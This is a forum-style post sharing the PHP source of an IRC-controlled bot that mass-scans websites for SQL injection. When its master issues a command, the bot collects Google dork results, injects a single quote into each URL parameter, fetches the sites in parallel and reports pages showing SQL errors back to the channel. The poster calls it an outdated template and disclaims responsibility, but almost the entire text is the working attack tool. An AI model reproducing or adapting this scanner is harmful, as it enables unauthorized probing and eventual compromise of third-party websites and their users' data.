Hey guys,
This script could only be used as template to create a PHP-based IRC Client/Bot, its vulnerability scanning functions are now useless.
This one comes from the Dark Ages of GRnet, enjoy 🙂
In any case I do not have any responsibility on how the script runs and what errors might pop up on your computer.
<?php
set_time_limit(0);
/**
* @author Atlantean.
*/
//########################INFORMATION##################################
$server = "global.irc.gr";
$port = 6667;
$me = "php_scanner";
$channel = "#scripting";
$identify = "id";
$master = array("Atlantean");
//EDIT THIS
$max_results = 500; // maximum Google results //
$threads = 10; //URLS TO test IN the same time!!
//#####################################################################
$search = array("mysql_num_rows()", "mysql_fetch_rows()", "main(", "extract()",
"mysql_result()", "Syntax Error", "You Have An error", "mysql error",
"SQL ERROR", "Warning: ");
//###############################SERVER WRITE##########################
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!socket_connect($socket, $server, $port))
{
echo "\n[-]Unable To connect...\n\n\n";
exit;
}
socket_write($socket, "USER php 127.0.0.1 PHP :PHP Bot\nNICK $me\nJOIN :$channel\n");
//###############################Encode The Dork#############################
function encodeDork($s)
{
$tmp = "";
for ($i = 0; $i < strlen($s); $i++)
{
$tmp .= "&#" . hexdec(bin2hex($s[$i])) . ";";
}
return urlencode($tmp);
}
//###############################cURL MULTI THREAD#############################
function ExecHandle(&$curlHandle)
{
$flag = null;
do
{
curl_multi_exec($curlHandle, $flag);
} while ($flag > 0);
}
while ($read = socket_read($socket, 2048))
{
$cmd = explode(" ", $read);
$nick = explode(':', $cmd[0]);
$nick = explode('!', $nick[1]);
$nick = strtolower($nick[0]);
switch ($cmd[1])
{
case "KICK":
if ($cmd[3] == $me)
{
socket_write($socket, "\nJOIN :" . $channel . "\n");
}
break;
case "PRIVMSG":
if (in_array($nick, $master))
{
switch (str_replace(array(chr(10), chr(13)), '', $cmd[3]))
{
case ":!join":
socket_write($socket, "\nJOIN :" . $cmd[4] . "\n");
break;
case ":!exit":
exit(socket_write($socket, "\nQUIT :Connection Lost\n"));
break;
case ":!part":
socket_write($socket, "\nPART :" . $cmd[4] . "\n");
break;
case ":!sql":
if (!isset($cmd[4]))
{
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
"12[-] Enter Dork!\r\n");
} else
{
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
"12[+] SQL Vulnerabilty Scan Started ...\nPRIVMSG $channel :" . chr(3) . "4$nick " .
chr(3) . "12[+] Dork : $cmd[4] \r\n");
$vuln_array = array();
$google = "http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=0";
$ch = curl_init($google);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
$ret = curl_exec($ch);
curl_close($ch);
if (stristr($ret, '302 Moved') != false)
{
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[-] Banned From Google!! \r\n");
break;
}
preg_match_all("/of( about)* <b>([\d,]+)<\/b>/", $ret, $max);
$max = str_replace(",", "", $max[2][0]);
$max = $max > $max_results ? $max_results : $max;
$i = 0;
while ($i < $max)
{
$ch = curl_init("http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=" . $i);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
$ret = curl_exec($ch);
preg_match_all("/<h3 class=r><a href=\"(.*?)\"/", $ret, $links);
if (@$links[1])
{
foreach ($links[1] as $l)
{
if (strpos($l, '=') != false)
{
$url = explode('=', $l);
$url = $url[0] . "='";
if (!in_array($url, $vuln_array))
{
array_push($vuln_array, $url);
}
}
}
}
curl_close($ch);
$i = $max > 10 ? $i += 10 : $i++;
}
array_unique($vuln_array);
sort($vuln_array);
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Got " . count($vuln_array) . " Valid URLs! Injection Started...\r\n");
$p = 0;
$o = $threads;
$curlHandle = curl_multi_init();
do
{
$tmp = count($vuln_array);
for ($i = 0; $i < $threads && $i < $tmp; $i++)
{
$cURL[$i] = curl_init($vuln_array[$i]);
curl_setopt($cURL[$i], CURLOPT_URL, $vuln_array[$i]);
curl_setopt($cURL[$i], CURLOPT_HEADER, 0);
curl_setopt($cURL[$i], CURLOPT_RETURNTRANSFER, true);
curl_multi_add_handle($curlHandle, $cURL[$i]);
}
ExecHandle($curlHandle);
for ($i = 0; $i < $threads && $i < $tmp; $i++)
{
$source[$i] = curl_multi_getcontent($cURL[$i]);
}
for ($i = 0; $i < $threads && $i < $tmp; $i++)
{
foreach ($search as $error)
{
if (stristr($source[$i], $error) != false)
{
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
"12[+] Possible Bug Found: $vuln_array[$i]\n");
$p++;
break;
}
}
}
for ($i = 0; $i < $threads && $i < $tmp; $i++)
{
curl_multi_remove_handle($curlHandle, $cURL[$i]);
unset($vuln_array[$i]);
}
sort($vuln_array);
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
"12[+] Scanned $o...\r\n");
$o += $threads;
unset($source);
unset($cURL);
} while (count($vuln_array) > 0);
curl_multi_close($curlHandle);
unset($vuln_array);
unset($source);
unset($cURL);
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Done. $p Bugs Found.\r\n");
}
break;
}
}
break;
}
if ($cmd[0] == "PING")
{
socket_write($socket, "PONG " . $cmd[1] . "\n");
}
}
socket_close($socket);
?>